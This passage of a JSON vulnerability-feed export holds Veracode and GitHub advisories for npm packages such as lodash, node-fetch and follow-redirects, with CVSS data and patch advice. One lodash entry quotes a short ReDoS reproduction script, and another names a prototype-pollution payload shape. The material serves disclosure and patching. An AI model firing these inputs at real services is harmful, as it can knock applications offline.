"cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-05-11T04:03:28", "type": "veracode", "title": "Prototype Pollution", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42581"], "modified": "2022-06-07T01:46:48", "id": "VERACODE:35471", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-35471/summary", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2022-07-26T16:40:15", "description": "node-fetch is vulnerable to denial of service. The `size` option after following a redirect is not adhered to, which does not result in a `FetchError` being thrown and the process ending without failure when a content size was over the limit.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2020-09-11T03:20:47", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15168"], "modified": "2020-11-29T15:58:48", "id": "VERACODE:26730", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-26730/summary", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-07-26T16:36:22", "description": "lodash is vulnerable to regular expression denial of service. The usage of the insecure regex `/\\s+$/` allows an attacker to cause exponential processing time which could eventually lead to a denial of service condition.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-02-16T04:13:54", "type": "veracode", "title": "Regular Expression Denial Of Service (ReDoS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28500"], "modified": "2022-07-25T21:04:44", "id": "VERACODE:29408", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-29408/summary", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-07-27T10:19:03", "description": "lodash is vulnerable to prototype pollution attack. The vulnerability exists due to the ability to inject properties on Object.prototype using the function `zipObjectDeep`, leading to DoS, and possibly other forms of attacks.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.4, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2020-04-28T09:42:14", "type": "veracode", "title": "Prototype Pollution", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8203"], "modified": "2022-05-12T16:32:30", "id": "VERACODE:25079", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-25079/summary", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2022-07-26T16:39:01", "description": "trim is vulnerable to regular expression denial of service (ReDoS). An attacker can pass a malicious string input `str` via `trim()` to cause a resource exhaustion and an application crash.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-10-28T00:28:18", "type": "veracode", "title": "Regular Expression Denial Of Service (ReDoS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7753"], "modified": "2022-04-26T19:14:24", "id": "VERACODE:27683", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-27683/summary", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-07-26T16:27:50", "description": "lodash is vulnerable to command injection. The vulnerability exists through the unsanitized values of `template`.\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-16T01:50:12", "type": "veracode", "title": "Command Injection", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-23337"], "modified": "2022-07-25T21:04:46", "id": "VERACODE:29405", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-29405/summary", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-07-17T13:00:13", "description": "semver-regex is vulnerable to regular expression denial of service. An attacker is able to crash the application by submitting a malicious string to the function semverRegex.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-09-16T04:00:40", "type": "veracode", "title": "Regular Expression Denial Of Service (ReDoS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3795"], "modified": "2022-05-12T05:21:22", "id": "VERACODE:32126", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-32126/summary", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-07-17T12:58:15", "description": "follow-redirects is vulnerable to information disclosure. The vulnerability exists because the HTTP Authorization header is sent via an insecure HTTP channel when a same-hostname HTTPS-to-HTTP redirect is received, allowing attackers in the same network to discover credentials by sniffing the network traffic.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-02-10T05:03:15", "type": "veracode", "title": "Information Disclosure", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0536"], "modified": "2022-02-11T22:33:54", "id": "VERACODE:34127", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-34127/summary", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-14T12:30:51", "description": "Node-fetch is vulnerable to denial of service. The vulnerability lies in the `referrer` field in the `fetch()` function, leading to inefficient Regular Expression Complexity. If an attacker is able to use a large character string in the `referrer` field, the program will either hang or crash.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-02T15:12:31", "type": "veracode", "title": "Regular Expression Denial Of Service (ReDoS)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-2596"], "modified": "2022-08-12T16:00:04", "id": "VERACODE:36570", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-36570/summary", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-13T19:06:46", "description": "node-fetch is vulnerable to information disclosure. The vulnerability exists due to the cookie header being leaked to third party site which allows an attacker to gain access to sensitive information. \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2022-01-17T09:09:26", "type": "veracode", "title": "Information Disclosure", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0235"], "modified": "2023-01-13T04:28:30", "id": "VERACODE:33726", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-33726/summary", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2022-10-28T20:59:37", "description": "follow-redirects is vulnerable to information disclosure. The cookie is exposed when the system is fetching a remote url with the `redirect`. \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-01-12T03:51:13", "type": "veracode", "title": "Information Disclosure", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0155"], "modified": "2022-10-28T18:20:42", "id": "VERACODE:33599", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-33599/summary", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "github": [{"lastseen": "2023-01-28T05:06:46", "description": "An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the semver-regex npm package, when an attacker is able to supply arbitrary input to the test() method", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-06-03T00:01:00", "type": "github", "title": "Regular expression denial of service in semver-regex", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43307"], "modified": "2023-01-28T05:00:58", "id": "GHSA-4X5V-GMQ8-25CH", "href": "https://github.com/advisories/GHSA-4x5v-gmq8-25ch", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-09T05:07:01", "description": "### Impact\nNode Fetch did not honor the `size` option after following a redirect, which means that when a content size was over the limit, a `FetchError` would never get thrown and the process would end without failure.\n\nFor most people, this fix will have a little or no impact. However, if you are relying on node-fetch to gate files above a size, the impact could be significant, for example: If you don't double-check the size of the data after `fetch()` has completed, your JS thread could get tied up doing work on a large file (DoS) and/or cost you money in computing.\n\n### Patches\nWe released patched versions for both stable and beta channels:\n\n- For `v2`: 2.6.1\n- For `v3`: 3.0.0-beta.9\n\n### Workarounds\nNone, it is strongly recommended to update as soon as possible.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [node-fetch](https://github.com/node-fetch/node-fetch/issues/new?assignees=&labels=question&template=support-or-usage.md&title=Question%3A+)\n* Contact one of the core maintainers.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2020-09-10T17:46:21", "type": "github", "title": "The `size` option isn't honored after following a redirect in node-fetch", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15168"], "modified": "2023-01-09T05:04:27", "id": "GHSA-W7RC-RWVF-8Q5R", "href": "https://github.com/advisories/GHSA-w7rc-rwvf-8q5r", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-27T08:26:24", "description": "All versions of package lodash prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions. Steps to reproduce (provided by reporter Liyuan Chen): var lo = require('lodash'); function build_blank (n) { var ret = \"1\" for (var i = 0; i < n; i++) { ret += \" \" } return ret + \"1\"; } var s = build_blank(50000) var time0 = Date.now(); lo.trim(s) var time_cost0 = Date.now() - time0; console.log(\"time_cost0: \" + time_cost0) var time1 = Date.now(); lo.toNumber(s) var time_cost1 = Date.now() - time1; console.log(\"time_cost1: \" + time_cost1) var time2 = Date.now(); lo.trimEnd(s) var time_cost2 = Date.now() - time2; console.log(\"time_cost2: \" + time_cost2)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2022-01-06T20:30:46", "type": "github", "title": "Regular Expression Denial of Service (ReDoS) in lodash", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28500"], "modified": "2023-01-27T05:07:54", "id": "GHSA-29MW-WPGM-HMR9", "href": "https://github.com/advisories/GHSA-29mw-wpgm-hmr9", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-01T05:08:37", "description": "Versions of `lodash` before 4.17.12 are vulnerable to Prototype Pollution. The function `defaultsDeep` allows a malicious user to modify the prototype of `Object` via `{constructor: {prototype: {...}}}` causing the addition or modification of an existing property that will exist on all objects.\n\n\n\n\n## Recommendation\n\nUpdate to version 4.17.12 or later.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2019-07-10T19:45:23", "type": "github", "title": "Prototype Pollution in lodash", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10744"], "modified": "2023-02-01T05:02:18", "id": "GHSA-JF85-CPCP-J695", "href": "https://github.com/advisories/GHSA-jf85-cpcp-j695", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-03-08T05:09:56", "description": "Versions of lodash prior to 4.17.19 are vulnerable to Prototype Pollution. The function zipObjectDeep allows a malicious user to modify the prototype of Object if the property identifiers are user-supplied. Being affected by this issue requires zipping objects based on user-provided property arrays.\n\nThis vulnerability causes the addition or modification of an existing property that will exist on all objects and may lead to Denial of Service or Code Execution under specific circumstances.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.4, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2020-07-15T19:15:48", "type": "github", "title": "Prototype Pollution in lodash", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8203"], "modified": "2023-03-08T05:05:35", "id": "GHSA-P6MC-M468-83GW", "href": "https://github.com/advisories/GHSA-p6mc-m468-83gw", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-02-01T05:08:11", "description": "All versions of package trim lower than 0.0.3 are vulnerable to Regular Expression Denial of Service (ReDoS) via trim().", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-10T18:44:22", "type": "github", "title": "Regular Expression Denial of Service in trim", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7753"], "modified": "2023-02-01T05:05:26", "id": "GHSA-W5P7-H5W8-2HFQ", "href": "https://github.com/advisories/GHSA-w5p7-h5w8-2hfq", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-28T23:09:36", "description": "`lodash` versions prior to 4.17.21 are vulnerable to Command Injection via the template function.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T16:05:51", "type": "github", "title": "Command Injection in lodash", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-23337"], "modified": "2023-02-28T22:27:17", "id": "GHSA-35JH-R3H4-6JHM", "href": "https://github.com/advisories/GHSA-35jh-r3h4-6jhm", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-02-01T05:07:54", "description": "npm `semver-regex` is vulnerable to Inefficient Regular Expression Complexity", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-09-20T20:42:25", "type": "github", "title": "Regular Expression Denial of Service (ReDOS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", 